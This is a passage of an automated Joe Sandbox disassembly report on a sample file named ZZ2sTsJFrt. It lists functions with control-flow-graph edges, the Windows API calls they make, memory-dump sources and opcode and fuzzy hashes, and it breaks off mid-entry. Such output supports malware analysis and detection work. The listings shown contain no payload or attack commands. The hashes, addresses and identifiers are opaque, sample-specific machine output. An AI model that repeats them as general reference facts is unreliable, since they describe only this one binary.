                                                                          • Opcode ID: bd10e7d38a72b9734a3b4f31ad8e74778cedc56685570707f9f267b3f422da2d
                                                                          • Instruction ID: 6ed3917a66646aae2b032236a670b4ee5915b714df9946dfde688e03e943cc32
                                                                          • Opcode Fuzzy Hash: bd10e7d38a72b9734a3b4f31ad8e74778cedc56685570707f9f267b3f422da2d
                                                                          • Instruction Fuzzy Hash: EE51E371904384AAEB309F24A844BEBBBF5AF82764F44041DF9C1971A1D7B5C9C8FB52
                                                                          Function 00F2A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 910 f2a95b-f2a974 911 f2a976-f2a986 call f2ef4c 910->911 912 f2a98a-f2a98f 910->912 911->912 922 f2a988 911->922 913 f2a991-f2a999 912->913 914 f2a99c-f2a9c0 MultiByteToWideChar 912->914 913->914 916 f2ab53-f2ab66 call f1fbbc 914->916 917 f2a9c6-f2a9d2 914->917 919 f2aa26 917->919 920 f2a9d4-f2a9e5 917->920 926 f2aa28-f2aa2a 919->926 923 f2a9e7-f2a9f6 call f32010 920->923 924 f2aa04-f2aa15 call f28e06 920->924 922->912 930 f2ab48 923->930 937 f2a9fc-f2aa02 923->937 924->930 938 f2aa1b 924->938 929 f2aa30-f2aa43 MultiByteToWideChar 926->929 926->930 929->930 931 f2aa49-f2aa5b call f2af6c 929->931 932 f2ab4a-f2ab51 call f2abc3 930->932 939 f2aa60-f2aa64 931->939 932->916 941 f2aa21-f2aa24 937->941 938->941 939->930 942 f2aa6a-f2aa71 939->942 941->926 943 f2aa73-f2aa78 942->943 944 f2aaab-f2aab7 942->944 943->932 945 f2aa7e-f2aa80 943->945 946 f2ab03 944->946 947 f2aab9-f2aaca 944->947 945->930 948 f2aa86-f2aaa0 call f2af6c 945->948 949 f2ab05-f2ab07 946->949 950 f2aae5-f2aaf6 call f28e06 947->950 951 f2aacc-f2aadb call f32010 947->951 948->932 963 f2aaa6 948->963 954 f2ab41-f2ab47 call f2abc3 949->954 955 f2ab09-f2ab22 call f2af6c 949->955 950->954 962 f2aaf8 950->962 951->954 966 f2aadd-f2aae3 951->966 954->930 955->954 968 f2ab24-f2ab2b 955->968 967 f2aafe-f2ab01 962->967 963->930 966->967 967->949 969 f2ab67-f2ab6d 968->969 970 f2ab2d-f2ab2e 968->970 971 f2ab2f-f2ab3f WideCharToMultiByte 969->971 970->971 971->954 972 f2ab6f-f2ab76 call f2abc3 971->972 972->932
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F25695,00F25695,?,?,?,00F2ABAC,00000001,00000001,2DE85006), ref: 00F2A9B5
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F2ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00F2AA3B
                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F2AB35
                                                                          • __freea.LIBCMT ref: 00F2AB42
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          • __freea.LIBCMT ref: 00F2AB4B
                                                                          • __freea.LIBCMT ref: 00F2AB70
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1414292761-0
                                                                          • Opcode ID: 9a8945e8411796e312c9a334ccaed7aee3c366c74afcb964d89a178b66309e29
                                                                          • Instruction ID: 11b6b36f09b813850b930367563272a0971094d203e77e706a025ffbe39c5280
                                                                          • Opcode Fuzzy Hash: 9a8945e8411796e312c9a334ccaed7aee3c366c74afcb964d89a178b66309e29
                                                                          • Instruction Fuzzy Hash: AB51D472A00226AFDB258F64EC51FBFB7AAEF84760F154669FC04D6140EB38DC50E691
                                                                          Function 00F23B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 975 f23b72-f23b7c 976 f23bee-f23bf1 975->976 977 f23bf3 976->977 978 f23b7e-f23b8c 976->978 979 f23bf5-f23bf9 977->979 980 f23b95-f23bb1 LoadLibraryExW 978->980 981 f23b8e-f23b91 978->981 984 f23bb3-f23bbc GetLastError 980->984 985 f23bfa-f23c00 980->985 982 f23b93 981->982 983 f23c09-f23c0b 981->983 987 f23beb 982->987 983->979 988 f23be6-f23be9 984->988 989 f23bbe-f23bd3 call f26088 984->989 985->983 986 f23c02-f23c03 FreeLibrary 985->986 986->983 987->976 988->987 989->988 992 f23bd5-f23be4 LoadLibraryExW 989->992 992->985 992->988
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00F23C35,?,?,00F62088,00000000,?,00F23D60,00000004,InitializeCriticalSectionEx,00F36394,InitializeCriticalSectionEx,00000000), ref: 00F23C03
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3664257935-2084034818
                                                                          • Opcode ID: 2a164f1b5689ca9baf4a0000f71809bfec57ea15920975b81333acf850d56bda
                                                                          • Instruction ID: 664494f9366038bfc5d7ce69ebd34fc6a3158ba882912d2f20c2f6acf6a9ec00
                                                                          • Opcode Fuzzy Hash: 2a164f1b5689ca9baf4a0000f71809bfec57ea15920975b81333acf850d56bda
                                                                          • Instruction Fuzzy Hash: 9F11C6B6E45635ABCB228F68AC41B5A37A4DF41770F250110F915FB290E778EF00B6D1
                                                                          Function 00F1AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00F1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                            • Part of subcall function 00F1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          • OleInitialize.OLE32(00000000), ref: 00F1AC2F
                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1AC66
                                                                          • SHGetMalloc.SHELL32(00F48438), ref: 00F1AC70
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                          • String ID: riched20.dll$3Ro
                                                                          • API String ID: 3498096277-3613677438
                                                                          • Opcode ID: 248056f088b4f02464ac667d16cb2a016058fd4f3c444f7513159f493aeaac8e
                                                                          • Instruction ID: 2899c43d20634c3a57b77d7e95461939feb6848ff5e31a11bd0bb140ca20754a
                                                                          • Opcode Fuzzy Hash: 248056f088b4f02464ac667d16cb2a016058fd4f3c444f7513159f493aeaac8e
                                                                          • Instruction Fuzzy Hash: 65F0FFB1D00209ABCB10AFA9D8499DFFFFCEF84714F00415AE815A2251DBB856459BA1
                                                                          Function 00F098E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 997 f098e0-f09901 call f1ec50 1000 f09903-f09906 997->1000 1001 f0990c 997->1001 1000->1001 1002 f09908-f0990a 1000->1002 1003 f0990e-f0991f 1001->1003 1002->1003 1004 f09921 1003->1004 1005 f09927-f09931 1003->1005 1004->1005 1006 f09933 1005->1006 1007 f09936-f09943 call f06edb 1005->1007 1006->1007 1010 f09945 1007->1010 1011 f0994b-f0996a CreateFileW 1007->1011 1010->1011 1012 f099bb-f099bf 1011->1012 1013 f0996c-f0998e GetLastError call f0bb03 1011->1013 1015 f099c3-f099c6 1012->1015 1017 f099c8-f099cd 1013->1017 1019 f09990-f099b3 CreateFileW GetLastError 1013->1019 1015->1017 1018 f099d9-f099de 1015->1018 1017->1018 1020 f099cf 1017->1020 1021 f099e0-f099e3 1018->1021 1022 f099ff-f09a10 1018->1022 1019->1015 1025 f099b5-f099b9 1019->1025 1020->1018 1021->1022 1026 f099e5-f099f9 SetFileTime 1021->1026 1023 f09a12-f09a2a call f10602 1022->1023 1024 f09a2e-f09a39 1022->1024 1023->1024 1025->1015 1026->1022
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00F07760,?,00000005,?,00000011), ref: 00F0995F
                                                                          • GetLastError.KERNEL32(?,?,00F07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F0996C
                                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00F07760,?,00000005,?), ref: 00F099A2
                                                                          • GetLastError.KERNEL32(?,?,00F07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F099AA
                                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F099F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$CreateErrorLast$Time
                                                                          • String ID:
                                                                          • API String ID: 1999340476-0
                                                                          • Opcode ID: ceeae2808a75cb8e06683110455cc2fc0d0b2d5a02605b42bd2687229be67eb0
                                                                          • Instruction ID: b9a9cd7fb267abef4ff2b3223fe5548427ffa427ddb1a19a568f5655ecd4a879
                                                                          • Opcode Fuzzy Hash: ceeae2808a75cb8e06683110455cc2fc0d0b2d5a02605b42bd2687229be67eb0
                                                                          • Instruction Fuzzy Hash: 4A3113709483456FE7209B24CD46BDABB94BB44330F100B19F9A1961D2E7E4A984FB95
                                                                          Function 00F1B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1056 f1b568-f1b581 PeekMessageW 1057 f1b583-f1b597 GetMessageW 1056->1057 1058 f1b5bc-f1b5be 1056->1058 1059 f1b599-f1b5a6 IsDialogMessageW 1057->1059 1060 f1b5a8-f1b5b6 TranslateMessage DispatchMessageW 1057->1060 1059->1058 1059->1060 1060->1058
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                          • IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                          • TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                          • DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 1266772231-0
                                                                          • Opcode ID: cad5d8fb7999d6f2cd258970fcca0cb2297265f8d8fc0d7208b9f3d9b67aa2d4
                                                                          • Instruction ID: ef19848cc7d21e35e400670f03cfa2ee6764325419ce2e8ab09e438b41f3221e
                                                                          • Opcode Fuzzy Hash: cad5d8fb7999d6f2cd258970fcca0cb2297265f8d8fc0d7208b9f3d9b67aa2d4
                                                                          • Instruction Fuzzy Hash: 05F01D71E0112EBB8B209BE19C4CDDB7FACEE062A47004414F915D2010EB74D609EBB0
                                                                          Function 00F1ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1061 f1abab-f1abca GetClassNameW 1062 f1abf2-f1abf4 1061->1062 1063 f1abcc-f1abe1 call f11fbb 1061->1063 1064 f1abf6-f1abf9 SHAutoComplete 1062->1064 1065 f1abff-f1ac01 1062->1065 1068 f1abf1 1063->1068 1069 f1abe3-f1abef FindWindowExW 1063->1069 1064->1065 1068->1062 1069->1068
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 00F1ABC2
                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F1ABF9
                                                                            • Part of subcall function 00F11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F0C116,00000000,.exe,?,?,00000800,?,?,?,00F18E3C), ref: 00F11FD1
                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F1ABE9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                          • String ID: EDIT
                                                                          • API String ID: 4243998846-3080729518
                                                                          • Opcode ID: 2f39817da64961c981ae669c5b2f62f618cdf5c9a0520d84da7acde85eed4118
                                                                          • Instruction ID: d77957c34383f5651d631547696afb68cf3f6a810675ba685ff9dc7c857d2dcf
                                                                          • Opcode Fuzzy Hash: 2f39817da64961c981ae669c5b2f62f618cdf5c9a0520d84da7acde85eed4118
                                                                          • Instruction Fuzzy Hash: 78F08232A0122C76DB3096249C09FDB766C9B86B50F484011FA05A21C0D7A4EA85A5B6
                                                                          Function 00F09785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1070 f09785-f09791 1071 f09793-f0979b GetStdHandle 1070->1071 1072 f0979e-f097b5 ReadFile 1070->1072 1071->1072 1073 f09811 1072->1073 1074 f097b7-f097c0 call f098bc 1072->1074 1075 f09814-f09817 1073->1075 1078 f097c2-f097ca 1074->1078 1079 f097d9-f097dd 1074->1079 1078->1079 1082 f097cc 1078->1082 1080 f097ee-f097f2 1079->1080 1081 f097df-f097e8 GetLastError 1079->1081 1084 f097f4-f097fc 1080->1084 1085 f0980c-f0980f 1080->1085 1081->1080 1083 f097ea-f097ec 1081->1083 1086 f097cd-f097d7 call f09785 1082->1086 1083->1075 1084->1085 1087 f097fe-f09807 GetLastError 1084->1087 1085->1075 1086->1075 1087->1085 1090 f09809-f0980a 1087->1090 1090->1086
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00F09795
                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00F097AD
                                                                          • GetLastError.KERNEL32 ref: 00F097DF
                                                                          • GetLastError.KERNEL32 ref: 00F097FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FileHandleRead
                                                                          • String ID:
                                                                          • API String ID: 2244327787-0
                                                                          • Opcode ID: e251e34b9142f1339500ebcd550c73f131e4b8de875802685ab7d79f00fce618
                                                                          • Instruction ID: f1923afdec376ee2639d8cac74e2dbee574c05a3c8e5fb37969141ac1a28417a
                                                                          • Opcode Fuzzy Hash: e251e34b9142f1339500ebcd550c73f131e4b8de875802685ab7d79f00fce618
                                                                          • Instruction Fuzzy Hash: F4117032918204EBDF209F64CC0466937A9BB46335F508629F456852D2F7F89E44FB61
                                                                          Function 00F2AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1091 f2ad34-f2ad48 1092 f2ad55-f2ad70 LoadLibraryExW 1091->1092 1093 f2ad4a-f2ad53 1091->1093 1095 f2ad72-f2ad7b GetLastError 1092->1095 1096 f2ad99-f2ad9f 1092->1096 1094 f2adac-f2adae 1093->1094 1097 f2ad8a 1095->1097 1098 f2ad7d-f2ad88 LoadLibraryExW 1095->1098 1099 f2ada1-f2ada2 FreeLibrary 1096->1099 1100 f2ada8 1096->1100 1102 f2ad8c-f2ad8e 1097->1102 1098->1102 1099->1100 1101 f2adaa-f2adab 1100->1101 1101->1094 1102->1096 1103 f2ad90-f2ad97 1102->1103 1103->1101
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F23F73,00000000,00000000,?,00F2ACDB,00F23F73,00000000,00000000,00000000,?,00F2AED8,00000006,FlsSetValue), ref: 00F2AD66
                                                                          • GetLastError.KERNEL32(?,00F2ACDB,00F23F73,00000000,00000000,00000000,?,00F2AED8,00000006,FlsSetValue,00F37970,FlsSetValue,00000000,00000364,?,00F298B7), ref: 00F2AD72
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F2ACDB,00F23F73,00000000,00000000,00000000,?,00F2AED8,00000006,FlsSetValue,00F37970,FlsSetValue,00000000), ref: 00F2AD80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 3177248105-0
                                                                          • Opcode ID: d86f7c6a22fbcd43d66b750f9005dd804d3fafa97595dbba3e36b85a353b5a5b
                                                                          • Instruction ID: b0d03d6ffe6fe50c8fa82ce140e4dcc0423b708cf03261891aa1af07890c1203
                                                                          • Opcode Fuzzy Hash: d86f7c6a22fbcd43d66b750f9005dd804d3fafa97595dbba3e36b85a353b5a5b
                                                                          • Instruction Fuzzy Hash: 4F01F236A0123AAFC7318A68BC44A977BA9EF05BB37610620FD06D7650DB20D801A6E1
                                                                          Function 00F09F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00F0D343,00000001,?,?,?,00000000,00F1551D,?,?,?), ref: 00F09F9E
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00F1551D,?,?,?,?,?,00F14FC7,?), ref: 00F09FE5
                                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00F0D343,00000001,?,?), ref: 00F0A011
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$Handle
                                                                          • String ID:
                                                                          • API String ID: 4209713984-0
                                                                          • Opcode ID: cea99d713dd2398545dc83f04fb67cba13c0c77674481aa07f5c71c5da8e447b
                                                                          • Instruction ID: 4268ebf9bfd1ef68bc794a0510145cc6d2da87a90efe011a3b810f63f3e7fef7
                                                                          • Opcode Fuzzy Hash: cea99d713dd2398545dc83f04fb67cba13c0c77674481aa07f5c71c5da8e447b
                                                                          • Instruction Fuzzy Hash: 5F31C27260830AAFDB14CF20D818BAEB7A6FF84725F000519F841972D0D775AD48FBA2
                                                                          Function 00F0A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F0C27E: _wcslen.LIBCMT ref: 00F0C284
                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A2D9
                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A30C
                                                                          • GetLastError.KERNEL32(?,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A329
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2260680371-0
                                                                          • Opcode ID: 73e076cc0795b6c26cf908835c06dd46402623384dd2dddeb1019234f93dd677
                                                                          • Instruction ID: 6ba2c062c1b2587df98935ca5a2f59710f81e475fe45d806ff80e7ffb1bf1ee5
                                                                          • Opcode Fuzzy Hash: 73e076cc0795b6c26cf908835c06dd46402623384dd2dddeb1019234f93dd677
                                                                          • Instruction Fuzzy Hash: C501F775A003146AEF21EB754C0ABFD33889F0A7A4F044468F901E60D5D769DA81F7B7
                                                                          Function 00F2B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00F2B8B8
                                                                          Strings
                                                                          Memory Dump Source
